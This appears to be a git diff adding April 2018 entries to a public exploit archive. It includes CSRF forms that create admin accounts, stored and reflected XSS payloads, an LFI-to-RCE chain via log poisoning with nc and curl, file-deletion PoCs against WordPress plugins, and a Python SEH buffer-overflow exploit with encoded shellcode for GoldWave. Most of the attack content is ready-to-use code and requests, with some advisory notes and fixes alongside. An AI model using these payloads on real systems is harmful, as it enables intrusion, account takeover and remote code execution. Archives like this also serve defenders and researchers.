/?db_host=localhost%0D%0Adb_port=5432%0D%0Adb_name=KNETADMINDB%0D%0Adb_driver=pgsql%0D%0Adb_user=postgres%0D%0Adb_password=ENC(4YMilUUDS80QB5rD+Rhn1z89rNXQXxcw)%0D%0Adb_driverClassName=org.postgresql.Driver%0D%0Adb_url=jdbc:postgresql://localhost/KNETADMINDB%0D%0Adb_initialSize=1%0D%0Adb_maxActive=20%0D%0Adb_dialect=org.hibernate.dialect.PostgreSQLDialect HTTP/1.1" 200 - \ No newline at end of file diff --git a/exploits/linux/webapps/44431.txt b/exploits/linux/webapps/44431.txt new file mode 100644 index 000000000..7f85f7847 --- /dev/null +++ b/exploits/linux/webapps/44431.txt @@ -0,0 +1,83 @@ +#Vendor: KYOCERA Corporation +#Product https://global.kyocera.com +#Affected version: 3.4.0906 +# +#Summary: KYOCERA Net Admin is Kyocera's unified +#device management software that uses a web-based +#platform to give network administrators easy and +#uncomplicated control to handle a fleet for up to +#10,000 devices. Tasks that used to require multiple +#programs or walking to each printer can now be +#accomplished in a single, fast and modern environment. +# +#Desc: The application interface allows users to perform +#certain actions via HTTP requests without performing +#any validity checks to verify the requests. This can +#be exploited to perform certain actions with administrative +#privileges if a logged-in user visits a malicious web +#site. +# +#Tested on: Microsoft Windows 7 Professional SP1 (EN) +#Apache Tomcat/8.5.15 +# +# +#Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +#@zeroscience +# +# +#Advisory ID: ZSL-2018-5458 +#Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5458.php + + + +KYOCERA Net Admin 3.4 CSRF Add Admin Exploit + + + + + +
+ + + + + + + + + + + + + + + + + +
+ + +
+ + + + +
+ + + + + + + + \ No newline at end of file diff --git a/exploits/multiple/dos/44427.txt b/exploits/multiple/dos/44427.txt new file mode 100644 index 000000000..ea0a6bb7f --- /dev/null +++ b/exploits/multiple/dos/44427.txt @@ -0,0 +1,16 @@ +When a WebAssembly binary is parsed in ModuleParser::parse, it is expected to contain certain sections in a certain order, but can also contain custom sections that can appear anywhere in the binary. The ordering check validateOrder() does not adequately check that sections are in the correct order when a binary contains custom sections. + +static inline bool validateOrder(Section previous, Section next) +{ + if (previous == Section::Custom) + return true; + return static_cast(previous) < static_cast(next); +} + +If the previous section was a custom section, the check always returns true, even if the section is otherwise out of order. This means any number of sections can be parsed from a binary, any number of times in any order. This leads to a number of possible overflows and type confusion bugs, as parsing assumes most sections are unique and in the right order. + +The attached html file causes a crash in Safari, the wasm file is attached as well. This particular use of the bug causes an overflow in the function vector. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44427.zip \ No newline at end of file diff --git a/exploits/php/webapps/44418.txt b/exploits/php/webapps/44418.txt new file mode 100644 index 000000000..5ae8edce3 --- /dev/null +++ b/exploits/php/webapps/44418.txt @@ -0,0 +1,64 @@ +####################################### +# Exploit Title: WolfCMS 0.8.3.1 Cross Site Request Forgery +# Google Dork: N/A +# Date: 04-04-2018 +####################################### +# Exploit Author: Sureshbabu Narvaneni# +####################################### +# Author Blog : http://nullnews.in +# Vendor Homepage: http://www.wolfcms.org +# Software Link: +https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip +# Affected Version: 0.8.3.1 +# Category: WebApps +# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 +# CVE : CVE-2018-8814 +# +# 1. Vendor Description: +# +# Light-weight, fast, simple and powerful CMS. PHP-based, easily extended +CMS. Uses MySQL, SQLite or (from 0.7) +# PostgreSQL for db. Simple drag & drop page hierarchy. Open source, +licensed under GPLv3. +# +# 2. Technical Description: +# +# Cross-site request forgery (CSRF) vulnerability in WolfCMS before 0.8.3.1 +allows remote attackers to hijack the +# authentication of users for requests that modify +plugin/[pluginname]/settings and can uninstall plugins by sending +# malicious request. +# +# 3. Proof Of Concept: +# +# Send below request to logged in user to change the plugin settings. +# +# +# +#
+# +# +# +#
+# +# +# +# +# Share the below URL to uninstall any plugin remotely. +# +# http://[url]/wolfcms/?/admin/setting/uninstall_plugin/[pluginname] +# +# +# 4. Solution: +# +# Upgrade to latest release. +# http://www.wolfcms.org/blog.html +# +# 5. Reference: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8814 +# https://github.com/wolfcms/wolfcms/issues/671 +##################################### \ No newline at end of file diff --git a/exploits/php/webapps/44419.txt b/exploits/php/webapps/44419.txt new file mode 100644 index 000000000..b9e0d92bc --- /dev/null +++ b/exploits/php/webapps/44419.txt @@ -0,0 +1,25 @@ +# Exploit Title: [Cobub Razor 0.7.2 Add New Superuser User] +# Date: [2018-03-07] +# Exploit Author: [ppb(ppb@5ecurity.cn)] +# Vendor Homepage: [https://github.com/cobub/razor/] +# Software Link: [https://github.com/cobub/razor/] +# Version: [0.72] +# CVE : [CVE-2018-7745] + +There is a vulnerability that can add an admnistrator user without login. +update the url and save to html ,then open it. + + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/44420.txt b/exploits/php/webapps/44420.txt new file mode 100644 index 000000000..05725465a --- /dev/null +++ b/exploits/php/webapps/44420.txt @@ -0,0 +1,16 @@ +# Exploit Title: MyBB Recent threads +# Date: 4th April 2018 +# Exploit Author: Perileos +# Software Link: https://community.mybb.com/mods.php?action=view&pid=191 +# Version: 17.0 +# Tested on: Windows 10 + +1. Description: +This plugin shows recent threads in the side bar on your MyBB forum. + +2. Proof of concept: + +Persistent XSS +- Create a thread with the following subject

"> +- Navigate to the index to see a board wide persistent XSS alert. \ No newline at end of file diff --git a/exploits/php/webapps/44421.txt b/exploits/php/webapps/44421.txt new file mode 100644 index 000000000..3767ef6b1 --- /dev/null +++ b/exploits/php/webapps/44421.txt @@ -0,0 +1,42 @@ +####################################### +# Exploit Title: WolfCMS 0.8.3.1 Open Redirection Vulnerability +# Google Dork: N/A +# Date: 04-04-2018 +####################################### +# Exploit Author: Sureshbabu Narvaneni# +####################################### +# Author Blog : http://nullnews.in +# Vendor Homepage: http://www.wolfcms.org +# Software Link: https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip +# Affected Version: 0.8.3.1 +# Category: WebApps +# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 +# CVE : CVE-2018-8813 +# +# 1. Vendor Description: +# +# Light-weight, fast, simple and powerful CMS. PHP-based, easily extended CMS. Uses MySQL, SQLite or (from 0.7) +# PostgreSQL for db. Simple drag & drop page hierarchy. Open source, licensed under GPLv3. +# +# 2. Technical Description: +# +# Open redirect vulnerability in the login[redirect] parameter login +functionality in WolfCMS before 0.8.3.1 allows +# remote attackers to redirect users to arbitrary web sites and conduct +phishing attacks via a malformed URL. +# +# 3. Proof Of Concept: +# +# Navigate to http://[URL]/wolfcms/?/admin/login +# Enter the credentials and replace login[redirect] to any url. +# You can see the unvalidated redirect. +# +# 4. Solution: +# +# Upgrade to latest release. +# http://www.wolfcms.org/blog.html +# +# 5. Reference: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8813 +# https://github.com/wolfcms/wolfcms/issues/670 +##################################### \ No newline at end of file diff --git a/exploits/php/webapps/44424.txt b/exploits/php/webapps/44424.txt new file mode 100644 index 000000000..3216d8843 --- /dev/null +++ b/exploits/php/webapps/44424.txt @@ -0,0 +1,66 @@ +# Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting +# Google Dork: intitle:"Proberv0." | inurl:/proberv.php +# Date: 23/03/2018 +# Exploit Author: ManhNho +# Vendor Homepage: http://www.yahei.net/ +# Software Link: www.yahei.net/tz/tz_e.zip +# Version: 0.4.7 +# CVE: CVE-2018-9238 +# Tested on: Windows 10 / Kali Linux +# Category: Webapps + + +#1. Description +----------------------------------------------------- +proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter. + + +#2. Proof of Concept +----------------------------------------------------- +Request: + +POST /proberv.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 +Firefox/59.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: /proberv.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 186 +Connection: close +Upgrade-Insecure-Requests: 1 + +pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd= + +----------------------------------------------------- +Response: + +HTTP/1.1 200 OK +Server: nginx +Date: Thu, 22 Mar 2018 16:59:57 GMT +Content-Type: text/html; charset=utf-8 +Connection: close +Vary: Accept-Encoding +Content-Length: 30461 +... + + + +Enter the function you want to test: + + + + + + +Test results +support the position: 错误') + + +#3. References +----------------------------------------------------- +https://pastebin.com/ia7U4vi9 +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9238 \ No newline at end of file diff --git a/exploits/php/webapps/44425.txt b/exploits/php/webapps/44425.txt new file mode 100644 index 000000000..87456ce8a --- /dev/null +++ b/exploits/php/webapps/44425.txt @@ -0,0 +1,42 @@ +# Exploit Title: Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE +# Date: 2018-04-08 +# Exploit Author: Graeme Robinson +# Contact: @Grasec +# Vendor Homepage: http://simple-fields.com +# Software Link: https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip +# Version: 0.2 - 0.3.5 +# Tested on: Ubuntu 16.04.4 + PHP 5.3.0 +# Category: webapps + + +1. Description +Versions 0.2 to 0.3.5 of the Simple Fields WordPress plugin are vulnerable to local file inclusion if running on PHP <5.3.4. This can even lead to remote code execution, for example by injecting php code into the apache logs or if allow_url_include is turned on in php.ini. + +PHP <5.3.4 is required because the exploit relies on the ability to inject a null byte to terminate a string before the script expects it to be and this was fixed in PHP 5.3.4 + +The vulnerability was fixed (commented out) in version 0.3.6 on 2011-02-03. Simple Fields is no longer actively developed, since 2016-02-27 (http://simple-fields.com/2016/bye-bye-simple-fields/) + +The vulnerable line of code in simple_fields.php is: + require( $_GET["wp_abspath"] . './wp-blog-header.php' ); + + +2. Proof of concept +LFI: + http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00 + +RCE: + $ echo ""|nc host 80 + $ curl "http://host/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=../../../../../logs/access_log%00&cmd=id" + + +3. Solutions: +* Upgrade PHP to 5.3.4+ +* Update Simple Fields to 0.3.6+ +* Stop using Simple Fields because it is no longer supported + + +4. Relevant Links: +* http://simple-fields.com +* https://wordpress.org/plugins/simple-fields/ +* https://downloads.wordpress.org/plugin/simple-fields.0.3.5.zip +* https://github.com/bonny/WordPress-Simple-Fields \ No newline at end of file diff --git a/exploits/php/webapps/44432.txt b/exploits/php/webapps/44432.txt new file mode 100644 index 000000000..9cb06725e --- /dev/null +++ b/exploits/php/webapps/44432.txt @@ -0,0 +1,47 @@ +# Exploit Title: Plugin Buddypress Xprofile Custom Fields Type 2.6.3 RCE – Unlink +# Date: 08/04/2018 +# Exploit Author: Lenon Leite +# Vendor Homepage: +# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/ +# Software Link: +# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 2.6.3 +# Tested on: Ubuntu 16.1 +# +#Article: +#http://lenonleite.com.br/publish-exploits/plugin-buddypress-xprofile-custom-fields-type-2-6-3-rce-unlink/ +# +#Video: +#https://www.youtube.com/watch?v=By7kT7UbHVk +# + +1 - Description + - Type user access: any user registered used in BuddyPress. + - $_POST[ 'field_' . $field_id . '_hiddenfile' ] is not escaped. + - $_POST[ 'field_' . $field_id . '_deleteimg' ] is not escaped. + + +2. Proof of Concept + +Login as regular user. + +1- Log in with BuddyPress User + +2 - Access Edit Profile: + +http://target/members/admin/profile/edit/ + +3 - Register data with image: + + 4 +- Change parameter to delete image in html and save profile: + + + +#-- +#*Atenciosamente* +# +#*Lenon Leite* \ No newline at end of file diff --git a/exploits/php/webapps/44433.txt b/exploits/php/webapps/44433.txt new file mode 100644 index 000000000..d31bc05b2 --- /dev/null +++ b/exploits/php/webapps/44433.txt @@ -0,0 +1,35 @@ +# Exploit Title: Plugin Woocommerce CSV importer 3.3.6 – RCE – Unlink +# Date: 08/04/2018 +# Exploit Author: Lenon Leite +# Vendor Homepage: *https://wordpress.org/plugins/woocommerce-csvimport/ +# Software Link: *https://wordpress.org/plugins/woocommerce-csvimport/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 3.3.6 +# Tested on: Ubuntu 16.1 +# + +1 - Description + + - Type user access: any user registered. + - $_POST['filename'] is not escaped. + +2. Proof of Concept + +

+ + +
+ + + - Date Discovery : *11/23/2017* + - Date Vendor Contact : *12/29/2017* + - Date Publish : 08/04/2018 + - Date Resolution : + + +#*Atenciosamente* +# +#*Lenon Leite* \ No newline at end of file diff --git a/exploits/php/webapps/44434.txt b/exploits/php/webapps/44434.txt new file mode 100644 index 000000000..eef91dbb6 --- /dev/null +++ b/exploits/php/webapps/44434.txt @@ -0,0 +1,65 @@ +# Exploit Title: iScripts SonicBB 1.0 - Reflected Cross-Site Scripting +# Date: 02/04/2018 +# Exploit Author: ManhNho +# Vendor Homepage: https://www.iscripts.com +# Demo Page: https://www.demo.iscripts.com/sonicbb/demo/ +# Version: 1.0 +# Tested on: Windows 10 +# Category: Webapps +# CVE: CVE-2018-9235 + +1. Description +==================== +iScripts SonicBB 1.0 has Reflected Cross-Site Scripting via the query +parameter to search.php + +2. PoC +==================== +Request: + +GET +/sonicbb/demo/search.php?query=%22%3E%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E +HTTP/1.1 +Host: www.demo.iscripts.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) +Gecko/20100101 Firefox/59.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: __utma=227100805.298811387.1522637403.1522637403.1522637403.1; +__utmb=227100805; __utmc=227100805; +__utmz=227100805.1522637403.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); +PHPSESSID=grh7l3amrvhoapig8ll268l9o4; +messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; hs-messages-is-open=false +Connection: close +Upgrade-Insecure-Requests: 1 + +Response: + +HTTP/1.1 200 OK +Date: Mon, 02 Apr 2018 02:58:48 GMT +Server: Apache +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Connection: close +Content-Type: text/html +Content-Length: 3619 +... + + iScripts Forum -> +">Search + +
+ + +
+ + +... + +3. References +==================== +https://pastebin.com/caQW37fY +https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9235 \ No newline at end of file diff --git a/exploits/php/webapps/44435.txt b/exploits/php/webapps/44435.txt new file mode 100644 index 000000000..e0040a5cb --- /dev/null +++ b/exploits/php/webapps/44435.txt @@ -0,0 +1,34 @@ +# Exploit Title: Plugin Google Drive for WordPress 2.2 – RCE – Unlik +# Date: 08/04/2018 +# Exploit Author: Lenon Leite +# Vendor Homepage: *https://wordpress.org/plugins/wp-google-drive/ +# Software Link: *https://wordpress.org/plugins/wp-google-drive/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 2.2 +# Tested on: Ubuntu 16.1 + +1 - Description + + + - Type user access: Don't need of login . + - $_POST[‘file_name’] is not escaped. + +2. Proof of Concept + +1 - Send data form: + +
+ + + + +
+ + +# - Date Discovery : *11/25/2017* +# - Date Vendor Contact : *12/26/2017* +# - Date Publish : 08/04/2018 +# - Date Resolution : \ No newline at end of file diff --git a/exploits/windows/local/44423.py b/exploits/windows/local/44423.py new file mode 100755 index 000000000..38950e686 --- /dev/null +++ b/exploits/windows/local/44423.py @@ -0,0 +1,68 @@ +#!/usr/bin/python + +# +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Exploit Title: GoldWave 5.70 - Local Buffer Overflow (SEH Unicode) +# Date: 04-05-2018 +# Vulnerable Software: GoldWave 5.70 +# Vendor Homepage: https://www.goldwave.com/ +# Version: 5.70 +# Software Link: http://goldwave.com//downloads/gwave570.exe +# Tested Windows 7 SP1 x86 +# +# +# PoC +# 1. generate goldwave570.txt, copy contents to clipboard +# 2. open gold wave app +# 3. select File, Open URL... +# 4. paste contents from clipboard after 'http://' +# 5. select OK +# 6. pop calc +# + +filename="goldwave570.txt" + +junk = "\x71"*1019 + +#popad +nseh = "\x61\x62" + +#0x006d000f : pop ecx # pop ebp # ret | startnull,unicode,ascii {PAGE_EXECUTE_READ} [GoldWave.exe] +seh = "\x0f\x6d" + +valign = ( +"\x53" #push ebx +"\x47" #align +"\x58" #pop eax +"\x47" #align +"\x05\x16\x11" #add eax,600 +"\x47" #align +"\x2d\x13\x11" #sub eax,300 +"\x47" #align +"\x50" #push eax +"\x47" #align +"\xc3" #retn +) + +#nops to shellcode +nops = "\x71" * 365 + +#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX +#Payload size: 517 bytes +calc = ( +"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AA" +"PAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIXTBKPM0M0S0DIK501I0C44" +"K0PP0DKPRLLTKQBMDTKBRO8LOFWOZMV01KOFLOLS13LLBNLO0WQXOLMKQI7K2KB0RQGTKPRN0DK0J" +"OL4K0LN1CHISOXKQXQ214K0YMPKQJ3DK0IN8K3NZOYTKNT4KM1YFNQKO6L91XOLMM1WW08IP45ZVK" +"S3MZXOKSMMTRUK4B8TKPXO4M1YCBFDKLLPKDKR8MLM1YC4KKTTKM18PU9PDO4MT1K1KQQR91J0QKO" +"IP1O1O1J4KN2ZK4MQMRJM14MSUVRM0M0M0PP2HNQTKROSWKO8UWKZPH55R1FQX6FF5WMEMKOXUOLL" +"F3LKZE0KKYPRUM5GKOWMCCBRO2JM023KOYE1S1QRLBCNNRERX1UM0AA") + +fill = "\x71"* 5000 + +buffer = junk + nseh + seh + valign + nops + calc + fill + +textfile = open(filename , 'w') +textfile.write(buffer) +textfile.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8d3edd7a2..b15603e15 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5923,6 +5923,8 @@ id,file,description,date,author,type,platform,port 44397,exploits/windows/dos/44397.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy (Incomplete Fix) (2)",2018-04-03,"Google Security Research",dos,windows, 44402,exploits/windows/dos/44402.txt,"Microsoft Windows Defender - 'mpengine.dll' Memory Corruption",2018-04-05,"Google Security Research",dos,windows, 44404,exploits/windows/dos/44404.html,"Microsoft Windows - Multiple Use-After-Free Issues in jscript Array Methods",2018-04-05,"Google Security Research",dos,windows, +44427,exploits/multiple/dos/44427.txt,"WebKit - WebAssembly Parsing Does not Correctly Check Section Order",2018-04-09,"Google Security Research",dos,multiple, +44428,exploits/linux/dos/44428.txt,"CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure",2018-04-09,"RedTeam Pentesting",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9635,6 +9637,9 @@ id,file,description,date,author,type,platform,port 44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows, 44410,exploits/windows/local/44410.txt,"Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass",2018-04-06,hyp3rlinx,local,windows, 44411,exploits/windows/local/44411.txt,"Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption",2018-04-06,hyp3rlinx,local,windows, +44422,exploits/java/local/44422.py,"H2 Database - 'Alias' Arbitrary Code Execution",2018-04-09,gambler,local,java, +44423,exploits/windows/local/44423.py,"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)",2018-04-09,bzyo,local,windows, +44426,exploits/linux/local/44426.py,"PMS 0.42 - Local Stack-Based Overflow (ROP)",2018-04-09,"Juan Sacco",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16374,6 +16379,7 @@ id,file,description,date,author,type,platform,port 44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows, 44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, 44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, +44297,exploits/linux/remote/44297.py,"Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution",2018-03-16,"Jared Arave",remote,linux, 44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows, 44349,exploits/linux/remote/44349.md,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)",2018-03-27,"Manish Tanwar",remote,linux, 44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows, @@ -39113,3 +39119,16 @@ id,file,description,date,author,type,platform,port 44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware, 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows, 44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross Site Request Forgery",2018-04-06,ppb,webapps,php, +44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php, +44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php, +44420,exploits/php/webapps/44420.txt,"MyBB Plugin Recent Threads On Index - Cross-Site Scripting",2018-04-09,Perileos,webapps,php, +44421,exploits/php/webapps/44421.txt,"WolfCMS 0.8.3.1 - Open Redirection",2018-04-09,"Sureshbabu Narvaneni",webapps,php,80 +44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php, +44425,exploits/php/webapps/44425.txt,"WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution",2018-04-09,"Graeme Robinson",webapps,php,80 +44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json, +44430,exploits/linux/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,linux, +44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit",2018-04-09,LiquidWorm,webapps,linux, +44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php, +44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php, +44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting",2018-04-09,ManhNho,webapps,php, +44435,exploits/php/webapps/44435.txt,"WordPress Plugin Google Drive 2.2 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,